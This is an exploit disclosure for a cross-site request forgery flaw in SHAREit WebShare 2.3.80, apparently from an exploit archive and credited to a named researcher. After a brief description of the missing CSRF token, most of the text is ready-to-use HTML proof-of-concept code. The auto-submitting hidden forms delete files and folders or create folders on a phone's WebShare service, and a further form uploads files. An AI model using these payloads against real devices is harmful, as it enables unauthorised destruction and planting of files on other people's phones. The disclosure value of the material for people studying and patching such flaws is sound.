SHAREit WebShare 2.3.80 Cross Site Request Forgery
Posted on 20 November 2015
<!-- Exploit Title: SHAREit WebShare Cross Site Request Forgery Vendor Home Page: http://shareit.lenovo.com Software Link: http://shareit.lenovo.com/download.html Version: 2.3.80 Tested On: IOS 9.1, Windows 7 Date: 19 Nov. 2015 Researcher: Mahdi.Hidden POC: There is a CSRF vulnerability in SHAREit last version in WebShare section. For test it open the application on your phone and go to "WebShare". Afterwards, the application will give you the URL of WebShare. (For example: http://192.168.1.2) You will see the page which lets you transferring file between PC and Phone. You can Make Folder, Upload File, Delete File, Delete Folder and ... but there is no security token for prevent CSRF. This vulnerability allows you to Delete File, Delete Folder and ... . There is some exploit for doing this. --> <!-- Delete File --> <form action="[Host]/delete" method="post" name="csrf"> (Ex. http://192.168.1.2) <input type="hidden" name="path" value="/[Path]/[File]"> (Ex. /folder/image.jpg) </form> <script language="javascript"> setTimeout(csrf.submit(),1); </script> <!-- Delete Folder --> <form action="[Host]/delete" method="post" name="csrf"> (Ex. http://192.168.1.2) <input type="hidden" name="path" value="/[Path]/"> (Ex. /folder/) </form> <script language="javascript"> setTimeout(csrf.submit(),1); </script> <!-- Add Folder --> <form action="[Host]/create" method="post" name="csrf"> (Ex. http://192.168.1.2) <input type="hidden" name="path" value="/[Path]"> (Ex. /folder/image.jpg) </form> <script language="javascript"> setTimeout(csrf.submit(),1); </script> <!-- Upload File --> <form action="http://192.168.1.4/upload" method="post" enctype="multipart/form-data"> (Ex. http://192.168.1.2) <input type="file" name="files[]" multiple> <input type="hidden" name="path" value="[Path]"> <input type="submit"> </form> <!-- # Mahdi.Hidden # Ashiyane Digital Security Team -->